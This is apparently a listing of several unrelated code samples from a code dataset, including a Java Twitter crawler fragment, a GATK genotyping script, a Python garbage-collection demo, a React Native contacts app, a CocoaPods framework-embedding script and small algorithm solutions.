    public static void main(String[] args) {
        try {
            MultifocalCrawler cn = new MultifocalCrawler();
            cn.crawl();
        } catch (TwitterException te) {
            te.printStackTrace();
            System.out.println("Failed to lookup users: " + te.getMessage());
            System.exit(-1);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** Unboxes a List&lt;Long&gt; into a primitive long[]. */
    private long[] convertLongs(List<Long> integers)
    {
        long[] ret = new long[integers.size()];
        for (int i=0; i < ret.length; i++)
        {
            ret[i] = integers.get(i).longValue();
        }
        return ret;
    }

    /** Directed edge between two users, identified by the endpoint IDs. */
    class Link2{
        public User from;
        public User to;

        public Link2(User f, User t) {
            from = f;
            to = t;
        }

        @Override
        public boolean equals(Object obj) {
            if (obj == this) {
                return true;
            }
            // FIX: the original condition `!(getClass() != obj.getClass())`
            // was inverted and rejected same-class instances.
            if (obj == null || this.getClass() != obj.getClass()) {
                return false;
            }
            Link2 other = (Link2)obj;
            return
                this.from.getId() == other.from.getId() &&
                this.to.getId() == other.to.getId();
        }

        @Override
        public int hashCode() {
            return String.valueOf(this.from.getId()).hashCode() + String.valueOf(this.to.getId()).hashCode();
        }

        @Override
        public String toString() {
            return String.valueOf(this.from.getId()) + " " + String.valueOf(this.to.getId());
        }
    }
}
|
#!/bin/bash
# Joint genotyping of 10 per-sample gVCFs (set sa0012) with GATK v4:
# CombineGVCFs -> GenotypeGVCFs -> SelectVariants (SNPs) -> VariantFiltration.
set -e
set -o pipefail
umask 0002

DATA_DIR=/srv/kenlab/celine/master_thesis/data/vcf_files/joint_genotyping/A_vcf_350/vcf_compressed
SCRATCH_DIR=~/script_dir/runtime_scripts/joint_parallel_10samples/scratch_GATKv4_jointgenotype_sa0012
# Reference genome (hoisted: the same path was repeated in every gatk call).
REF=/srv/GT/reference/Finger_millet/KEN/DENOVO_v2.0_A_subgenome/Sequence/WholeGenomeFasta/genome.fa

echo "Job runs on `hostname`"
echo "at $SCRATCH_DIR"
mkdir "$SCRATCH_DIR" || exit 1

source /usr/local/ngseq/etc/lmod_profile
module add Variants/GATK/4.1.2.0 Tools/Picard/2.18.0

# Decompress the per-sample gVCFs into scratch.
# FIX: loop replaces 10 copy-pasted gunzip lines; paths are quoted.
for i in {1..10}; do
    gunzip -c "$DATA_DIR/sa0012/$i.g.vcf.gz" > "$SCRATCH_DIR/$i.g.vcf"
done

cd "$SCRATCH_DIR" || exit 1
gatk --java-options "-Xmx10G" CombineGVCFs -R "$REF" -V 1.g.vcf -V 2.g.vcf -V 3.g.vcf -V 4.g.vcf -V 5.g.vcf -V 6.g.vcf -V 7.g.vcf -V 8.g.vcf -V 9.g.vcf -V 10.g.vcf -O GATKv4_Genotyping.g.vcf
# Inputs are no longer needed once combined.
rm -f {1..10}.g.vcf
gatk --java-options "-Xmx10G" GenotypeGVCFs -R "$REF" -V GATKv4_Genotyping.g.vcf -O GATKv4_Genotyping.raw.vcf
gatk --java-options "-Xmx10G" SelectVariants -R "$REF" -V GATKv4_Genotyping.raw.vcf -O GATKv4_Genotyping.raw.snp.vcf -select-type SNP
gatk --java-options "-Xmx10G" VariantFiltration -R "$REF" -V GATKv4_Genotyping.raw.snp.vcf --filter-expression "! vc.hasAttribute('QD') || QD < 2.0" --filter-name "QD" --filter-expression "vc.isSNP() && (MQ < 30.0 || (vc.hasAttribute('MQRankSum') && MQRankSum < -15.0))" --filter-name "MQ" --genotype-filter-expression "GQ < 20 || DP == 0" --genotype-filter-name "GQ" -O GATKv4_Genotyping.filtered.vcf
mv GATKv4_Genotyping.raw.snp.vcf GATKv4_Genotyping.raw.vcf
gzip GATKv4_Genotyping.raw.vcf
gzip GATKv4_Genotyping.filtered.vcf
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2010 <NAME>. All rights reserved.
#
"""Show the objects with references to a given object.
"""
#end_pymotw_header
import gc

# Enable verbose GC debugging; DEBUG_SAVEALL keeps everything the collector
# finds in gc.garbage instead of freeing it, so it can be inspected below.
flags = (gc.DEBUG_COLLECTABLE |
         gc.DEBUG_UNCOLLECTABLE |
         gc.DEBUG_OBJECTS |
         gc.DEBUG_SAVEALL
         )
gc.set_debug(flags)

class Graph(object):
    # Minimal linked node used to build reference cycles.
    def __init__(self, name):
        self.name = name
        self.next = None
    def set_next(self, next):
        self.next = next
    def __repr__(self):
        return '%s(%s)' % (self.__class__.__name__, self.name)

class CleanupGraph(Graph):
    # Same node, but with a finalizer that announces its own destruction.
    # NOTE(review): this script uses Python 2 print statements throughout.
    def __del__(self):
        print '%s.__del__()' % self

# Construct a graph cycle
one = Graph('one')
two = Graph('two')
one.set_next(two)
two.set_next(one)

# Construct another node that stands on its own
three = CleanupGraph('three')

# Construct a graph cycle with a finalizer
four = CleanupGraph('four')
five = CleanupGraph('five')
four.set_next(five)
five.set_next(four)

# Remove references to the graph nodes in this module's namespace
one = two = three = four = five = None

# Force a sweep
print 'Collecting'
gc.collect()
print 'Done'

# Report on what was left
for o in gc.garbage:
    if isinstance(o, Graph):
        print 'Retained: %s 0x%x' % (o, id(o))
|
<gh_stars>1-10
//
// Block.cpp
// SampleGame
//
// Created by <NAME> on 1/26/17.
// Edited by <NAME> on 03/08/2017
// Copyright © 2017 De Anza College Developers' Guild. All rights reserved.
//
#include "Block.h"
/* Default constructor.
 * Zero-initializes position and size, and leaves the block with no
 * texture or sprite and not passable.
 */
Block::Block(){
    _xPos = 0;
    _yPos = 0;
    _xyPosition = sf::Vector2f(0, 0);
    _width = 0;
    // Fix: these members were previously left uninitialized, which is
    // undefined behavior if the destructor or any accessor reads them
    // (e.g. deleting a garbage _sprite pointer).
    _texture = nullptr;
    _sprite = nullptr;
    _passable = false;
}
/* Custom constructor.
 * @param texture   texture used to render the block (not owned)
 * @param x         x position of the block
 * @param y         y position of the block
 * @param wid       width of the block
 * @param passable  whether the block can be walked on
 */
Block::Block(sf::Texture* texture, float x, float y, int wid, bool passable)
{
    _xyPosition = sf::Vector2f(x, y);
    _xPos = x;
    _yPos = y;
    _passable = passable;
    _width = wid;
    _texture = texture;
    // The sprite is heap-allocated and positioned at the block's origin.
    _sprite = new sf::Sprite(*texture);
    _sprite->setPosition(x, y);
}
|
import React, { useState } from 'react';
import {
  Button,
  FlatList,
  Text,
  TextInput,
  TouchableOpacity,
  View
} from 'react-native';
const App = () => {
const [contacts, setContacts] = useState([]);
const [name, setName] = useState('');
const [editing, setEditing] = useState(false);
const [editingIndex, setEditingIndex] = useState(null);
const handleAddContact = () => {
const newContacts = [...contacts, { name }];
setContacts(newContacts);
setName('');
};
const handleEditContact = (index) => { const newName = contacts[index].name; setName(newName); setEditing(true); setEditingIndex(index);
};
const handleUpdateContact = () => {
const newContacts = [...contacts];
newContacts[editingIndex].name = name;
setContacts(newContacts);
setName('');
setEditing(false);
};
const handleDeleteContact = (index) => {
const newContacts = [...contacts];
newContacts.splice(index, 1);
setContacts(newContacts);
};
return (
<View>
<TextInput value={name} onChangeText={setName} />
{editing ? (
<Button title="Update Contact" onPress={handleUpdateContact} />
) : (
<Button title="Add Contact" onPress={handleAddContact} />
)}
<FlatList
data={contacts}
renderItem={({ item, index }) => (
<View>
<Text>{item.name}</Text>
<Button title="Edit Contact" onPress={() => handleEditContact(index)} />
<Button
title="Delete Contact"
onPress={() => handleDeleteContact(index)}
/>
</View>
)}
keyExtractor={(_, index) => `${index}`}
/>
</View>
);
};
export default App; |
#!/bin/sh
# Xcode build-phase script that embeds built frameworks into the app bundle,
# stripping invalid architectures and re-signing as needed (CocoaPods style —
# TODO confirm generator/version before editing by hand).
set -e
# Ensure the destination Frameworks directory exists in the build products.
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
# Swift runtime dylibs for the current platform; only used below when
# building with Xcode < 7 (which did not embed them automatically).
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
# install_framework <path>
# Copies the framework at $1 into the app's Frameworks folder, resolving
# symlinked build products, stripping architectures not in VALID_ARCHS,
# and re-signing the copied framework. With Xcode < 7 it also embeds the
# Swift runtime dylibs the framework binary links against.
install_framework()
{
# Locate the source: full path under BUILT_PRODUCTS_DIR, then just its
# basename there, then the literal path as given.
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
# A symlinked product must be dereferenced so rsync copies the real files.
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# use filter instead of exclude so missing patterns don't throw errors
echo "rsync -av --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync -av --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
# Work out where the framework's executable ended up: either inside a
# .framework bundle or as a bare binary in the destination.
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
# List the @rpath libswift* dylibs the binary links against; `exit` with
# PIPESTATUS[0] propagates otool's status through the pipeline.
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# code_sign_if_enabled <path>
# Signs $1 with the expanded code-sign identity, unless code signing is
# disallowed or not required by the build settings.
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code sign identity
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
echo "/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} --preserve-metadata=identifier,entitlements \"$1\""
# Fix: quote the identity so a value containing spaces (e.g. a full
# "iPhone Developer: ..." name) is passed as a single argument instead
# of being word-split.
/usr/bin/codesign --force --sign "${EXPANDED_CODE_SIGN_IDENTITY}" --preserve-metadata=identifier,entitlements "$1"
fi
}
# strip_invalid_archs <binary>
# Removes, in place, every architecture slice in <binary> that is not
# listed in VALID_ARCHS, and reports what was stripped.
strip_invalid_archs() {
binary="$1"
# Get architectures for current file
# (lipo prints "Architectures in the fat file: <path> are: <archs>";
# take the text after the last colon)
archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | rev)"
stripped=""
for arch in $archs; do
if ! [[ "${VALID_ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
}
# Embed the pod framework for both supported build configurations.
case "$CONFIGURATION" in
Debug|Release)
install_framework "Pods-RadialActivityIndicatorTest/RadialActivityIndicator.framework"
;;
esac
|
package com.github.chen0040.leetcode.day03.medium;
/**
* Created by xschen on 30/7/2017.
*
* summary:
* You are given an n x n 2D matrix representing an image.
* Rotate the image by 90 degrees (clockwise).
*
* link: https://leetcode.com/problems/rotate-image/description/
*/
public class RotateImage {
   public class Solution {
      /**
       * Rotates the n x n matrix 90 degrees clockwise, in place.
       *
       * A clockwise quarter-turn is equivalent to transposing the matrix
       * (mirror across the main diagonal) and then reversing each row.
       *
       * @param matrix square matrix of ints; modified in place
       */
      public void rotate(int[][] matrix) {
         final int n = matrix.length;
         // Step 1: transpose — swap each element above the diagonal with
         // its mirror below it.
         for (int r = 0; r < n; ++r) {
            for (int c = r + 1; c < n; ++c) {
               int tmp = matrix[r][c];
               matrix[r][c] = matrix[c][r];
               matrix[c][r] = tmp;
            }
         }
         // Step 2: reverse every row to complete the clockwise rotation.
         for (int r = 0; r < n; ++r) {
            for (int lo = 0, hi = n - 1; lo < hi; ++lo, --hi) {
               int tmp = matrix[r][lo];
               matrix[r][lo] = matrix[r][hi];
               matrix[r][hi] = tmp;
            }
         }
      }
   }
}
|
def reverse_string(s):
    """Return a copy of ``s`` with its characters in reverse order."""
    return "".join(reversed(s))


# Driver code: demonstrate the helper on a sample string.
sample = "Hello World!"
print("The reversed string is : ", end="")
print(reverse_string(sample))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.